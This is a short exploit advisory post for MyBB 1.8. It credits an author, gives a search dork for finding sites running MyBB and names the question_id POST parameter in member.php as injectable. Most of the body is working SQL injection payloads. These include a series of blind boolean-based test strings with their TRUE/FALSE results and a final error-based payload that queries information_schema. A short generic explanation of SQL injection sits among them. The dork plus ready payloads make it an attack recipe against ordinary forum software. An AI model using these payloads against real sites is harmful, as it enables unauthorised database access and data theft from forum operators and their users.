facebook facebook twitter rss

MyBB 1.8 SQL Injection Vulnerability

Author: indoushka , Published: 25-10-2014
MyBB 1.8 SQL Injection Vulnerability
====================================
Author : indoushka
Vondor : http://www.mybb.com/
Dork: Powered By MyBB
==========================

Blind SQL Injection :

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /mybb/member.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input question_id was set to GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz'/**/AND/**/'0006gfF'='0006gfF

Tests performed:
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 2+1-1-1=0+0+0+1 AND '0006gfF'='0006gfF => TRUE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3+1-1-1=0+0+0+1 AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2<(0+5+0+0) AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2>(0+5+0+0) AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 2+1-1-1=1 AND '0006gfF'='0006gfF => TRUE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3+1-1-1=1 AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2<5 AND '0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz' AND 3*2>5 AND '0006gfF'='0006gfF => TRUE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz'/**/AND/**/0=1/**/AND/**/'0006gfF'='0006gfF => FALSE
GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz'/**/AND/**/'0006gfF'='0006gfF => TRUE

Original value: GgPGTiEr1CsGbJaBJPRXvxEh2AHU7tYz

SQL Injection :

URL encoded POST input question_id was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(116),CHAR(122),CHAR(52),CHAR(122),CHAR(109),CHAR(106),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

Like us on Facebook :